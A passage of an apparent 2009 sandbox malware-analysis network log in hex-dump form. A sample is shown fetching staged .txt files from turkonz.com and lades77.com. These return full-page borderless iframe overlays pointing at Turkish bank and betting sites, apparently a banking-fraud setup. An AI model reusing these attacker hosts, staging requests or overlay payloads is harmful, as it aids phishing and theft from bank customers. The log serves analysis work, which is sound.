0a44 6174 653a 2046 7269 2c20 3230 204d    .Date: Fri, 20 M
6172 2032 3030 3920 3131 3a30 323a 3037    ar 2009 11:02:07
2047 4d54 0d0a 5365 7276 6572 3a20 4170     GMT..Server: Ap
6163 6865 2f32 2e32 2e31 3120 2855 6e69    ache/2.2.11 (Uni
7829 206d 6f64 5f73 736c 2f32 2e32 2e31    x) mod_ssl/2.2.1
3120 4f70 656e 5353 4c2f 302e 392e 3869    1 OpenSSL/0.9.8i
2044 4156 2f32 206d 6f64 5f61 7574 685f     DAV/2 mod_auth_
7061 7373 7468 726f 7567 682f 322e 3120    passthrough/2.1 
6d6f 645f 6277 6c69 6d69 7465 642f 312e    mod_bwlimited/1.
3420 4672 6f6e 7450 6167 652f 352e 302e    4 FrontPage/5.0.
322e 3236 3335 0d0a 4c61 7374 2d4d 6f64    2.2635..Last-Mod
6966 6965 643a 2046 7269 2c20 3233 204a    ified: Fri, 23 J
616e 2032 3030 3920 3034 3a31 353a 3431    an 2009 04:15:41
2047 4d54 0d0a 4554 6167 3a20 2236 3038     GMT..ETag: "608
3035 382d 3139 382d 3436 3131 6561 3435    058-198-4611ea45
3833 3534 3022 0d0a 4163 6365 7074 2d52    83540"..Accept-R
616e 6765 733a 2062 7974 6573 0d0a 436f    anges: bytes..Co
6e74 656e 742d 4c65 6e67 7468 3a20 3430    ntent-Length: 40
380d 0a43 6f6e 7465 6e74 2d54 7970 653a    8..Content-Type:
2074 6578 742f 706c 6169 6e0d 0a0d 0a3c     text/plain....<
6469 7620 7374 796c 653d 2270 6f73 6974    div style="posit
696f 6e3a 2061 6273 6f6c 7574 653b 207a    ion: absolute; z
2d69 6e64 6578 3a20 343b 206c 6566 743a    -index: 4; left:
2030 7078 3b20 746f 703a 2031 7078 3b20     0px; top: 1px; 
0d0a 6865 6967 6874 3a37 3537 7078 2220    ..height:757px" 
6964 3d22 6c61 7965 7235 223e 0d0a 3c49    id="layer5">..<I
4652 414d 4520 6e61 6d65 3d49 3120 0d0a    FRAME name=I1 ..
7372 633d 2268 7474 703a 2f2f 7777 772e    src="http://www.
7375 7065 7262 6168 6973 3139 392e 636f    superbahis199.co
6d2f 742f 696e 6465 782e 6173 7078 2220    m/t/index.aspx" 
0d0a 7769 6474 683d 3130 3025 0d0a 6865    ..width=100%..he
6967 6874 3d31 3030 2520 206d 6172 6769    ight=100%  margi
6e68 6569 6768 743d 2230 2220 6d61 7267    nheight="0" marg
696e 7769 6474 683d 2230 2220 2073 6372    inwidth="0"  scr
6f6c 6c69 6e67 3d22 6e6f 2220 0d0a 626f    olling="no" ..bo
7264 6572 3d22 3022 200d 0a66 7261 6d65    rder="0" ..frame
626f 7264 6572 3d22 3022 200d 0a74 6f70    border="0" ..top
3d22 3022 206c 6566 743d 2230 223e 0d0a    ="0" left="0">..
596f 7572 2062 726f 7773 6572 2064 6f65    Your browser doe
7320 6e6f 7420 7375 7070 6f72 7420 696e    s not support in
6c69 6e65 2066 7261 6d65 7320 6f72 2069    line frames or i
7320 6375 7272 656e 746c 7920 636f 6e66    s currently conf
6967 7572 6564 200d 0a6e 6f74 2074 6f20    igured ..not to 
6469 7370 6c61 7920 696e 6c69 6e65 2066    display inline f
7261 6d65 732e 0d0a 3c2f 4946 5241 4d45    rames...</IFRAME
3e3c 2f64 6976 3e                          ></div>

from ANUBIS:1074 to 78.111.96.8:80

State: Normal establishment and termination - Transferred outbound Bytes: 316 - Transferred inbound Bytes: 632

Data sent:

    
4745 5420 2f69 6d67 2f6a 7067 2f79 6873    GET /img/jpg/yhs
622e 7478 7420 4854 5450 2f31 2e31 0d0a    b.txt HTTP/1.1..
436f 6e74 656e 742d 5479 7065 3a20 7465    Content-Type: te
7874 2f68 746d 6c0d 0a48 6f73 743a 2077    xt/html..Host: w
7777 2e74 7572 6b6f 6e7a 2e63 6f6d 0d0a    ww.turkonz.com..
4163 6365 7074 3a20 7465 7874 2f68 746d    Accept: text/htm
6c2c 202a 2f2a 0d0a 5573 6572 2d41 6765    l, */*..User-Age
6e74 3a20 4d6f 7a69 6c6c 612f 332e 3020    nt: Mozilla/3.0 
2863 6f6d 7061 7469 626c 653b 2049 6e64    (compatible; Ind
7920 4c69 6272 6172 7929 0d0a 0d0a         y Library)....

Data received:

    
4854 5450 2f31 2e31 2032 3030 204f 4b0d    HTTP/1.1 200 OK.
0a43 6f6e 7465 6e74 2d4c 656e 6774 683a    .Content-Length:
2034 310d 0a43 6f6e 7465 6e74 2d54 7970     41..Content-Typ
653a 2074 6578 742f 706c 6169 6e0d 0a4c    e: text/plain..L
6173 742d 4d6f 6469 6669 6564 3a20 4672    ast-Modified: Fr
692c 2032 3320 4a61 6e20 3230 3039 2030    i, 23 Jan 2009 0
343a 3233 3a34 3220 474d 540d 0a41 6363    4:23:42 GMT..Acc
6570 742d 5261 6e67 6573 3a20 6279 7465    ept-Ranges: byte
730d 0a45 5461 673a 2022 6632 3237 6462    s..ETag: "f227db
3566 3132 3764 6339 313a 6164 3966 6322    5f127dc91:ad9fc"
0d0a 5365 7276 6572 3a20 4d69 6372 6f73    ..Server: Micros
6f66 742d 4949 532f 362e 300d 0a58 2d50    oft-IIS/6.0..X-P
6f77 6572 6564 2d42 793a 2050 6c65 736b    owered-By: Plesk
5769 6e0d 0a58 2d50 6f77 6572 6564 2d42    Win..X-Powered-B
793a 2041 5350 2e4e 4554 0d0a 4461 7465    y: ASP.NET..Date
3a20 4672 692c 2032 3020 4d61 7220 3230    : Fri, 20 Mar 20
3039 2031 313a 3032 3a30 3720 474d 540d    09 11:02:07 GMT.
0a0d 0a68 7474 703a 2f2f 7777 772e 6c61    ...http://www.la
6465 7337 372e 636f 6d2f 696d 6167 6573    des77.com/images
2f6a 732f 7968 7362 2e74 7874              /js/yhsb.txt

Data sent:

    
4745 5420 2f69 6d67 2f6a 7067 2f79 6873    GET /img/jpg/yhs
622e 7478 7420 4854 5450 2f31 2e31 0d0a    b.txt HTTP/1.1..
436f 6e74 656e 742d 5479 7065 3a20 7465    Content-Type: te
7874 2f68 746d 6c0d 0a48 6f73 743a 2077    xt/html..Host: w
7777 2e74 7572 6b6f 6e7a 2e63 6f6d 0d0a    ww.turkonz.com..
4163 6365 7074 3a20 7465 7874 2f68 746d    Accept: text/htm
6c2c 202a 2f2a 0d0a 5573 6572 2d41 6765    l, */*..User-Age
6e74 3a20 4d6f 7a69 6c6c 612f 332e 3020    nt: Mozilla/3.0 
2863 6f6d 7061 7469 626c 653b 2049 6e64    (compatible; Ind
7920 4c69 6272 6172 7929 0d0a 0d0a         y Library)....

Data received:

    
4854 5450 2f31 2e31 2032 3030 204f 4b0d    HTTP/1.1 200 OK.
0a43 6f6e 7465 6e74 2d4c 656e 6774 683a    .Content-Length:
2034 310d 0a43 6f6e 7465 6e74 2d54 7970     41..Content-Typ
653a 2074 6578 742f 706c 6169 6e0d 0a4c    e: text/plain..L
6173 742d 4d6f 6469 6669 6564 3a20 4672    ast-Modified: Fr
692c 2032 3320 4a61 6e20 3230 3039 2030    i, 23 Jan 2009 0
343a 3233 3a34 3220 474d 540d 0a41 6363    4:23:42 GMT..Acc
6570 742d 5261 6e67 6573 3a20 6279 7465    ept-Ranges: byte
730d 0a45 5461 673a 2022 6632 3237 6462    s..ETag: "f227db
3566 3132 3764 6339 313a 6164 3966 6322    5f127dc91:ad9fc"
0d0a 5365 7276 6572 3a20 4d69 6372 6f73    ..Server: Micros
6f66 742d 4949 532f 362e 300d 0a58 2d50    oft-IIS/6.0..X-P
6f77 6572 6564 2d42 793a 2050 6c65 736b    owered-By: Plesk
5769 6e0d 0a58 2d50 6f77 6572 6564 2d42    Win..X-Powered-B
793a 2041 5350 2e4e 4554 0d0a 4461 7465    y: ASP.NET..Date
3a20 4672 692c 2032 3020 4d61 7220 3230    : Fri, 20 Mar 20
3039 2031 313a 3032 3a30 3720 474d 540d    09 11:02:07 GMT.
0a0d 0a68 7474 703a 2f2f 7777 772e 6c61    ...http://www.la
6465 7337 372e 636f 6d2f 696d 6167 6573    des77.com/images
2f6a 732f 7968 7362 2e74 7874              /js/yhsb.txt

from ANUBIS:1075 to 66.147.242.99:80

State: Normal establishment and termination - Transferred outbound Bytes: 160 - Transferred inbound Bytes: 737

Data sent:

    
4745 5420 2f69 6d61 6765 732f 6a73 2f79    GET /images/js/y
6873 622e 7478 7420 4854 5450 2f31 2e31    hsb.txt HTTP/1.1
0d0a 436f 6e74 656e 742d 5479 7065 3a20    ..Content-Type: 
7465 7874 2f68 746d 6c0d 0a48 6f73 743a    text/html..Host:
2077 7777 2e6c 6164 6573 3737 2e63 6f6d     www.lades77.com
0d0a 4163 6365 7074 3a20 7465 7874 2f68    ..Accept: text/h
746d 6c2c 202a 2f2a 0d0a 5573 6572 2d41    tml, */*..User-A
6765 6e74 3a20 4d6f 7a69 6c6c 612f 332e    gent: Mozilla/3.
3020 2863 6f6d 7061 7469 626c 653b 2049    0 (compatible; I
6e64 7920 4c69 6272 6172 7929 0d0a 0d0a

Data received:

    
4854 5450 2f31 2e31 2032 3030 204f 4b0d    HTTP/1.1 200 OK.
0a44 6174 653a 2046 7269 2c20 3230 204d    .Date: Fri, 20 M
6172 2032 3030 3920 3131 3a30 323a 3038    ar 2009 11:02:08
2047 4d54 0d0a 5365 7276 6572 3a20 4170     GMT..Server: Ap
6163 6865 2f32 2e32 2e31 3120 2855 6e69    ache/2.2.11 (Uni
7829 206d 6f64 5f73 736c 2f32 2e32 2e31    x) mod_ssl/2.2.1
3120 4f70 656e 5353 4c2f 302e 392e 3869    1 OpenSSL/0.9.8i
2044 4156 2f32 206d 6f64 5f61 7574 685f     DAV/2 mod_auth_
7061 7373 7468 726f 7567 682f 322e 3120    passthrough/2.1 
6d6f 645f 6277 6c69 6d69 7465 642f 312e    mod_bwlimited/1.
3420 4672 6f6e 7450 6167 652f 352e 302e    4 FrontPage/5.0.
322e 3236 3335 0d0a 4c61 7374 2d4d 6f64    2.2635..Last-Mod
6966 6965 643a 2046 7269 2c20 3233 204a    ified: Fri, 23 J
616e 2032 3030 3920 3034 3a31 343a 3439    an 2009 04:14:49
2047 4d54 0d0a 4554 6167 3a20 2236 3038     GMT..ETag: "608
3035 332d 3139 322d 3436 3131 6561 3133    053-192-4611ea13
6563 3034 3022 0d0a 4163 6365 7074 2d52    ec040"..Accept-R
616e 6765 733a 2062 7974 6573 0d0a 436f    anges: bytes..Co
6e74 656e 742d 4c65 6e67 7468 3a20 3430    ntent-Length: 40
320d 0a43 6f6e 7465 6e74 2d54 7970 653a    2..Content-Type:
2074 6578 742f 706c 6169 6e0d 0a0d 0a3c     text/plain....<
6469 7620 7374 796c 653d 2270 6f73 6974    div style="posit
696f 6e3a 2061 6273 6f6c 7574 653b 207a    ion: absolute; z
2d69 6e64 6578 3a20 343b 206c 6566 743a    -index: 4; left:
2030 7078 3b20 746f 703a 2031 7078 3b20     0px; top: 1px; 
0d0a 6865 6967 6874 3a37 3537 7078 2220    ..height:757px" 
6964 3d22 6c61 7965 7235 223e 0d0a 3c49    id="layer5">..<I
4652 414d 4520 6e61 6d65 3d49 3120 0d0a    FRAME name=I1 ..
7372 633d 2268 7474 703a 2f2f 7777 772e    src="http://www.
6873 6263 2e63 6f6d 2e74 722f 7472 2f69    hsbc.com.tr/tr/i
6e64 6578 2e61 7370 2220 0d0a 7769 6474    ndex.asp" ..widt
683d 3130 3025 0d0a 6865 6967 6874 3d31    h=100%..height=1
3030 2520 206d 6172 6769 6e68 6569 6768    00%  marginheigh
743d 2230 2220 6d61 7267 696e 7769 6474    t="0" marginwidt
683d 2230 2220 2073 6372 6f6c 6c69 6e67    h="0"  scrolling
3d22 6e6f 2220 0d0a 626f 7264 6572 3d22    ="no" ..border="
3022 200d 0a66 7261 6d65 626f 7264 6572    0" ..frameborder
3d22 3022 200d 0a74 6f70 3d22 3022 206c    ="0" ..top="0" l
6566 743d 2230 223e 0d0a 596f 7572 2062    eft="0">..Your b
726f 7773 6572 2064 6f65 7320 6e6f 7420    rowser does not 
7375 7070 6f72 7420 696e 6c69 6e65 2066    support inline f
7261 6d65 7320 6f72 2069 7320 6375 7272    rames or is curr
656e 746c 7920 636f 6e66 6967 7572 6564    ently configured
200d 0a6e 6f74 2074 6f20 6469 7370 6c61     ..not to displa
7920 696e 6c69 6e65 2066 7261 6d65 732e    y inline frames.
0d0a 3c2f 4946 5241 4d45 3e3c 2f64 6976    ..</IFRAME></div
3e                                         >

from ANUBIS:1076 to 78.111.96.8:80

State: Normal establishment and termination - Transferred outbound Bytes: 316 - Transferred inbound Bytes: 632

Data sent:

    
4745 5420 2f69 6d67 2f6a 7067 2f79 696e    GET /img/jpg/yin
672e 7478 7420 4854 5450 2f31 2e31 0d0a    g.txt HTTP/1.1..
436f 6e74 656e 742d 5479 7065 3a20 7465    Content-Type: te
7874 2f68 746d 6c0d 0a48 6f73 743a 2077    xt/html..Host: w
7777 2e74 7572 6b6f 6e7a 2e63 6f6d 0d0a    ww.turkonz.com..
4163 6365 7074 3a20 7465 7874 2f68 746d    Accept: text/htm
6c2c 202a 2f2a 0d0a 5573 6572 2d41 6765    l, */*..User-Age
6e74 3a20 4d6f 7a69 6c6c 612f 332e 3020    nt: Mozilla/3.0 
2863 6f6d 7061 7469 626c 653b 2049 6e64    (compatible; Ind
7920 4c69 6272 6172 7929 0d0a 0d0a         y Library)....

Data received:

    
4854 5450 2f31 2e31 2032 3030 204f 4b0d    HTTP/1.1 200 OK.
0a43 6f6e 7465 6e74 2d4c 656e 6774 683a    .Content-Length:
2034 310d 0a43 6f6e 7465 6e74 2d54 7970     41..Content-Typ
653a 2074 6578 742f 706c 6169 6e0d 0a4c    e: text/plain..L
6173 742d 4d6f 6469 6669 6564 3a20 4672    ast-Modified: Fr
692c 2032 3320 4a61 6e20 3230 3039 2030    i, 23 Jan 2009 0
343a 3233 3a34 3520 474d 540d 0a41 6363    4:23:45 GMT..Acc
6570 742d 5261 6e67 6573 3a20 6279 7465    ept-Ranges: byte
730d 0a45 5461 673a 2022 3130 6461 3732    s..ETag: "10da72
3631 3132 3764 6339 313a 6164 3966 6322    61127dc91:ad9fc"
0d0a 5365 7276 6572 3a20 4d69 6372 6f73    ..Server: Micros
6f66 742d 4949 532f 362e 300d 0a58 2d50    oft-IIS/6.0..X-P
6f77 6572 6564 2d42 793a 2050 6c65 736b    owered-By: Plesk
5769 6e0d 0a58 2d50 6f77 6572 6564 2d42    Win..X-Powered-B
793a 2041 5350 2e4e 4554 0d0a 4461 7465    y: ASP.NET..Date
3a20 4672 692c 2032 3020 4d61 7220 3230    : Fri, 20 Mar 20
3039 2031 313a 3032 3a30 3820 474d 540d    09 11:02:08 GMT.
0a0d 0a68 7474 703a 2f2f 7777 772e 6c61    ...http://www.la
6465 7337 372e 636f 6d2f 696d 6167 6573    des77.com/images
2f6a 732f 7969 6e67 2e74 7874              /js/ying.txt

Data sent:

    
4745 5420 2f69 6d67 2f6a 7067 2f79 696e    GET /img/jpg/yin
672e 7478 7420 4854 5450 2f31 2e31 0d0a    g.txt HTTP/1.1..
436f 6e74 656e 742d 5479 7065 3a20 7465    Content-Type: te
7874 2f68 746d 6c0d 0a48 6f73 743a 2077    xt/html..Host: w
7777 2e74 7572 6b6f 6e7a 2e63 6f6d 0d0a    ww.turkonz.com..
4163 6365 7074 3a20 7465 7874 2f68 746d    Accept: text/htm
6c2c 202a 2f2a 0d0a 5573 6572 2d41 6765    l, */*..User-Age
6e74 3a20 4d6f 7a69 6c6c 612f 332e 3020    nt: Mozilla/3.0 
2863 6f6d 7061 7469 626c 653b 2049 6e64    (compatible; Ind
7920 4c69 6272 6172 7929 0d0a 0d0a         y Library)....

Data received:

    
4854 5450 2f31 2e31 2032 3030 204f 4b0d    HTTP/1.1 200 OK.
0a43 6f6e 7465 6e74 2d4c 656e 6774 683a    .Content-Length:
2034 310d 0a43 6f6e 7465 6e74 2d54 7970     41..Content-Typ
653a 2074 6578 742f 706c 6169 6e0d 0a4c    e: text/plain..L
6173 742d 4d6f 6469 6669 6564 3a20 4672    ast-Modified: Fr
692c 2032 3320 4a61 6e20 3230 3039 2030    i, 23 Jan 2009 0
343a 3233 3a34 3520 474d 540d 0a41 6363    4:23:45 GMT..Acc
6570 742d 5261 6e67 6573 3a20 6279 7465    ept-Ranges: byte
730d 0a45 5461 673a 2022 3130 6461 3732    s..ETag: "10da72
3631 3132 3764 6339 313a 6164 3966 6322    61127dc91:ad9fc"
0d0a 5365 7276 6572 3a20 4d69 6372 6f73    ..Server: Micros
6f66 742d 4949 532f 362e 300d 0a58 2d50    oft-IIS/6.0..X-P
6f77 6572 6564 2d42 793a 2050 6c65 736b    owered-By: Plesk
5769 6e0d 0a58 2d50 6f77 6572 6564 2d42    Win..X-Powered-B
793a 2041 5350 2e4e 4554 0d0a 4461 7465    y: ASP.NET..Date
3a20 4672 692c 2032 3020 4d61 7220 3230    : Fri, 20 Mar 20
3039 2031 313a 3032 3a30 3920 474d 540d    09 11:02:09 GMT.
0a0d 0a68 7474 703a 2f2f 7777 772e 6c61    ...http://www.la
6465 7337 372e 636f 6d2f 696d 6167 6573    des77.com/images
2f6a 732f 7969 6e67 2e74 7874              /js/ying.txt

from ANUBIS:1077 to 66.147.242.99:80

State: Normal establishment and termination - Transferred outbound Bytes: 160 - Transferred inbound Bytes: 739

Data sent:

    
4745 5420 2f69 6d61 6765 732f 6a73 2f79    GET /images/js/y
696e 672e 7478 7420 4854 5450 2f31 2e31    ing.txt HTTP/1.1
0d0a 436f 6e74 656e 742d 5479 7065 3a20    ..Content-Type: 
7465 7874 2f68 746d 6c0d 0a48 6f73 743a    text/html..Host:
2077 7777 2e6c 6164 6573 3737 2e63 6f6d     www.lades77.com
0d0a 4163 6365 7074 3a20 7465 7874 2f68    ..Accept: text/h
746d 6c2c 202a 2f2a 0d0a 5573 6572 2d41    tml, */*..User-A
6765 6e74 3a20 4d6f 7a69 6c6c 612f 332e    gent: Mozilla/3.
3020 2863 6f6d 7061 7469 626c 653b 2049    0 (compatible; I
6e64 7920 4c69 6272 6172 7929 0d0a 0d0a

Data received:

    
4854 5450 2f31 2e31 2032 3030 204f 4b0d    HTTP/1.1 200 OK.
0a44 6174 653a 2046 7269 2c20 3230 204d    .Date: Fri, 20 M
6172 2032 3030 3920 3131 3a30 323a 3133    ar 2009 11:02:13
2047 4d54 0d0a 5365 7276 6572 3a20 4170     GMT..Server: Ap
6163 6865 2f32 2e32 2e31 3120 2855 6e69    ache/2.2.11 (Uni
7829 206d 6f64 5f73 736c 2f32 2e32 2e31    x) mod_ssl/2.2.1
3120 4f70 656e 5353 4c2f 302e 392e 3869    1 OpenSSL/0.9.8i
2044 4156 2f32 206d 6f64 5f61 7574 685f     DAV/2 mod_auth_
7061 7373 7468 726f 7567 682f 322e 3120    passthrough/2.1 
6d6f 645f 6277 6c69 6d69 7465 642f 312e    mod_bwlimited/1.
3420 4672 6f6e 7450 6167 652f 352e 302e    4 FrontPage/5.0.
322e 3236 3335 0d0a 4c61 7374 2d4d 6f64    2.2635..Last-Mod
6966 6965 643a 2046 7269 2c20 3233 204a    ified: Fri, 23 J
616e 2032 3030 3920 3034 3a31 353a 3031    an 2009 04:15:01
2047 4d54 0d0a 4554 6167 3a20 2236 3038     GMT..ETag: "608
3035 342d 3139 342d 3436 3131 6561 3166    054-194-4611ea1f
3564 6234 3022 0d0a 4163 6365 7074 2d52    5db40"..Accept-R
616e 6765 733a 2062 7974 6573 0d0a 436f    anges: bytes..Co
6e74 656e 742d 4c65 6e67 7468 3a20 3430    ntent-Length: 40
340d 0a43 6f6e 7465 6e74 2d54 7970 653a    4..Content-Type:
2074 6578 742f 706c 6169 6e0d 0a0d 0a3c     text/plain....<
6469 7620 7374 796c 653d 2270 6f73 6974    div style="posit
696f 6e3a 2061 6273 6f6c 7574 653b 207a    ion: absolute; z
2d69 6e64 6578 3a20 343b 206c 6566 743a    -index: 4; left:
2030 7078 3b20 746f 703a 2031 7078 3b20     0px; top: 1px; 
0d0a 6865 6967 6874 3a37 3537 7078 2220    ..height:757px" 
6964 3d22 6c61 7965 7235 223e 0d0a 3c49    id="layer5">..<I
4652 414d 4520 6e61 6d65 3d49 3120 0d0a    FRAME name=I1 ..
7372 633d 2268 7474 703a 2f2f 7777 772e    src="http://www.
696e 6762 616e 6b2e 636f 6d2e 7472 2f64    ingbank.com.tr/d
6566 6175 6c74 2e61 7370 2220 0d0a 7769    efault.asp" ..wi
6474 683d 3130 3025 0d0a 6865 6967 6874    dth=100%..height
3d31 3030 2520 206d 6172 6769 6e68 6569    =100%  marginhei
6768 743d 2230 2220 6d61 7267 696e 7769    ght="0" marginwi
6474 683d 2230 2220 2073 6372 6f6c 6c69    dth="0"  scrolli
6e67 3d22 6e6f 2220 0d0a 626f 7264 6572    ng="no" ..border
3d22 3022 200d 0a66 7261 6d65 626f 7264    ="0" ..framebord
6572 3d22 3022 200d 0a74 6f70 3d22 3022    er="0" ..top="0"
206c 6566 743d 2230 223e 0d0a 596f 7572     left="0">..Your
2062 726f 7773 6572 2064 6f65 7320 6e6f     browser does no
7420 7375 7070 6f72 7420 696e 6c69 6e65    t support inline
2066 7261 6d65 7320 6f72 2069 7320 6375     frames or is cu
7272 656e 746c 7920 636f 6e66 6967 7572    rrently configur
6564 200d 0a6e 6f74 2074 6f20 6469 7370    ed ..not to disp
6c61 7920 696e 6c69 6e65 2066 7261 6d65    lay inline frame
732e 0d0a 3c2f 4946 5241 4d45 3e3c 2f64    s...</IFRAME></d
6976 3e                                    iv>

from ANUBIS:1078 to 78.111.96.8:80

State: Normal establishment and termination - Transferred outbound Bytes: 316 - Transferred inbound Bytes: 632

Data sent:

    
4745 5420 2f69 6d67 2f6a 7067 2f79 6861    GET /img/jpg/yha
6c2e 7478 7420 4854 5450 2f31 2e31 0d0a    l.txt HTTP/1.1..
436f 6e74 656e 742d 5479 7065 3a20 7465    Content-Type: te
7874 2f68 746d 6c0d 0a48 6f73 743a 2077    xt/html..Host: w
7777 2e74 7572 6b6f 6e7a 2e63 6f6d 0d0a    ww.turkonz.com..
4163 6365 7074 3a20 7465 7874 2f68 746d    Accept: text/htm
6c2c 202a 2f2a 0d0a 5573 6572 2d41 6765    l, */*..User-Age
6e74 3a20 4d6f 7a69 6c6c 612f 332e 3020    nt: Mozilla/3.0 
2863 6f6d 7061 7469 626c 653b 2049 6e64    (compatible; Ind
7920 4c69 6272 6172 7929 0d0a 0d0a         y Library)....

Data received:

    
4854 5450 2f31 2e31 2032 3030 204f 4b0d    HTTP/1.1 200 OK.
0a43 6f6e 7465 6e74 2d4c 656e 6774 683a    .Content-Length:
2034 310d 0a43 6f6e 7465 6e74 2d54 7970     41..Content-Typ
653a 2074 6578 742f 706c 6169 6e0d 0a4c    e: text/plain..L
6173 742d 4d6f 6469 6669 6564 3a20 4672    ast-Modified: Fr
692c 2032 3320 4a61 6e20 3230 3039 2030    i, 23 Jan 2009 0
343a 3233 3a33 3920 474d 540d 0a41 6363    4:23:39 GMT..Acc
6570 742d 5261 6e67 6573 3a20 6279 7465    ept-Ranges: byte
730d 0a45 5461 673a 2022 6236 6630 6463    s..ETag: "b6f0dc
3564 3132 3764 6339 313a 6164 3966 6322    5d127dc91:ad9fc"
0d0a 5365 7276 6572 3a20 4d69 6372 6f73    ..Server: Micros
6f66 742d 4949 532f 362e 300d 0a58 2d50    oft-IIS/6.0..X-P
6f77 6572 6564 2d42 793a 2050 6c65 736b    owered-By: Plesk
5769 6e0d 0a58 2d50 6f77 6572 6564 2d42    Win..X-Powered-B
793a 2041 5350 2e4e 4554 0d0a 4461 7465    y: ASP.NET..Date
3a20 4672 692c 2032 3020 4d61 7220 3230    : Fri, 20 Mar 20
3039 2031 313a 3032 3a31 3320 474d 540d    09 11:02:13 GMT.
0a0d 0a68 7474 703a 2f2f 7777 772e 6c61    ...http://www.la
6465 7337 372e 636f 6d2f 696d 6167 6573    des77.com/images
2f6a 732f 7968 616c 2e74 7874              /js/yhal.txt

Data sent:

    
4745 5420 2f69 6d67 2f6a 7067 2f79 6861    GET /img/jpg/yha
6c2e 7478 7420 4854 5450 2f31 2e31 0d0a    l.txt HTTP/1.1..
436f 6e74 656e 742d 5479 7065 3a20 7465    Content-Type: te
7874 2f68 746d 6c0d 0a48 6f73 743a 2077    xt/html..Host: w
7777 2e74 7572 6b6f 6e7a 2e63 6f6d 0d0a    ww.turkonz.com..
4163 6365 7074 3a20 7465 7874 2f68 746d    Accept: text/htm
6c2c 202a 2f2a 0d0a 5573 6572 2d41 6765    l, */*..User-Age
6e74 3a20 4d6f 7a69 6c6c 612f 332e 3020    nt: Mozilla/3.0 
2863 6f6d 7061 7469 626c 653b 2049 6e64    (compatible; Ind
7920 4c69 6272 6172 7929 0d0a 0d0a         y Library)....

Data received:

    
4854 5450 2f31 2e31 2032 3030 204f 4b0d    HTTP/1.1 200 OK.
0a43 6f6e 7465 6e74 2d4c 656e 6774 683a    .Content-Length:
2034 310d 0a43 6f6e 7465 6e74 2d54 7970     41..Content-Typ
653a 2074 6578 742f 706c 6169 6e0d 0a4c    e: text/plain..L
6173 742d 4d6f 6469 6669 6564 3a20 4672    ast-Modified: Fr
692c 2032 3320 4a61 6e20 3230 3039 2030    i, 23 Jan 2009 0
343a 3233 3a33 3920 474d 540d 0a41 6363    4:23:39 GMT..Acc
6570 742d 5261 6e67 6573 3a20 6279 7465    ept-Ranges: byte
730d 0a45 5461 673a 2022 6236 6630 6463    s..ETag: "b6f0dc
3564 3132 3764 6339 313a 6164 3966 6322    5d127dc91:ad9fc"
0d0a 5365 7276 6572 3a20 4d69 6372 6f73    ..Server: Micros
6f66 742d 4949 532f 362e 300d 0a58 2d50    oft-IIS/6.0..X-P
6f77 6572 6564 2d42 793a 2050 6c65 736b    owered-By: Plesk
5769 6e0d 0a58 2d50 6f77 6572 6564 2d42    Win..X-Powered-B
793a 2041 5350 2e4e 4554 0d0a 4461 7465    y: ASP.NET..Date
3a20 4672 692c 2032 3020 4d61 7220 3230    : Fri, 20 Mar 20
3039 2031 313a 3032 3a31 3420 474d 540d    09 11:02:14 GMT.
0a0d 0a68 7474 703a 2f2f 7777 772e 6c61    ...http://www.la
6465 7337 372e 636f 6d2f 696d 6167 6573    des77.com/images
2f6a 732f 7968 616c 2e74 7874              /js/yhal.txt

from ANUBIS:1079 to 66.147.242.99:80

State: Normal establishment and termination - Transferred outbound Bytes: 160 - Transferred inbound Bytes: 735

Data sent:

    
4745 5420 2f69 6d61 6765 732f 6a73 2f79    GET /images/js/y
6861 6c2e 7478 7420 4854 5450 2f31 2e31    hal.txt HTTP/1.1
0d0a 436f 6e74 656e 742d 5479 7065 3a20    ..Content-Type: 
7465 7874 2f68 746d 6c0d 0a48 6f73 743a    text/html..Host:
2077 7777 2e6c 6164 6573 3737 2e63 6f6d     www.lades77.com
0d0a 4163 6365 7074 3a20 7465 7874 2f68    ..Accept: text/h
746d 6c2c 202a 2f2a 0d0a 5573 6572 2d41    tml, */*..User-A
6765 6e74 3a20 4d6f 7a69 6c6c 612f 332e    gent: Mozilla/3.
3020 2863 6f6d 7061 7469 626c 653b 2049    0 (compatible; I
6e64 7920 4c69 6272 6172 7929 0d0a 0d0a

Data received:

    
4854 5450 2f31 2e31 2032 3030 204f 4b0d    HTTP/1.1 200 OK.
0a44 6174 653a 2046 7269 2c20 3230 204d    .Date: Fri, 20 M
6172 2032 3030 3920 3131 3a30 323a 3135    ar 2009 11:02:15
2047 4d54 0d0a 5365 7276 6572 3a20 4170     GMT..Server: Ap
6163 6865 2f32 2e32 2e31 3120 2855 6e69    ache/2.2.11 (Uni
7829 206d 6f64 5f73 736c 2f32 2e32 2e31    x) mod_ssl/2.2.1
3120 4f70 656e 5353 4c2f 302e 392e 3869    1 OpenSSL/0.9.8i
2044 4156 2f32 206d 6f64 5f61 7574 685f     DAV/2 mod_auth_
7061 7373 7468 726f 7567 682f 322e 3120    passthrough/2.1 
6d6f 645f 6277 6c69 6d69 7465 642f 312e    mod_bwlimited/1.
3420 4672 6f6e 7450 6167 652f 352e 302e    4 FrontPage/5.0.
322e 3236 3335 0d0a 4c61 7374 2d4d 6f64    2.2635..Last-Mod
6966 6965 643a 2046 7269 2c20 3233 204a    ified: Fri, 23 J
616e 2032 3030 3920 3034 3a31 343a 3339    an 2009 04:14:39
2047 4d54 0d0a 4554 6167 3a20 2236 3038     GMT..ETag: "608
3035 322d 3139 302d 3436 3131 6561 3061    052-190-4611ea0a
3632 3963 3022 0d0a 4163 6365 7074 2d52    629c0"..Accept-R
616e 6765 733a 2062 7974 6573 0d0a 436f    anges: bytes..Co
6e74 656e 742d 4c65 6e67 7468 3a20 3430    ntent-Length: 40
300d 0a43 6f6e 7465 6e74 2d54 7970 653a    0..Content-Type:
2074 6578 742f 706c 6169 6e0d 0a0d 0a3c     text/plain....<
6469 7620 7374 796c 653d 2270 6f73 6974    div style="posit
696f 6e3a 2061 6273 6f6c 7574 653b 207a    ion: absolute; z
2d69 6e64 6578 3a20 343b 206c 6566 743a    -index: 4; left:
2030 7078 3b20 746f 703a 2031 7078 3b20     0px; top: 1px; 
0d0a 6865 6967 6874 3a37 3537 7078 2220    ..height:757px" 
6964 3d22 6c61 7965 7235 223e 0d0a 3c49    id="layer5">..<I
4652 414d 4520 6e61 6d65 3d49 3120 0d0a    FRAME name=I1 ..
7372 633d 2268 7474 703a 2f2f 7777 772e    src="http://www.
6861 6c6b 6261 6e6b 2e63 6f6d 2f69 6e64    halkbank.com/ind
6578 2e61 7370 2220 0d0a 7769 6474 683d    ex.asp" ..width=
3130 3025 0d0a 6865 6967 6874 3d31 3030    100%..height=100
2520 206d 6172 6769 6e68 6569 6768 743d    %  marginheight=
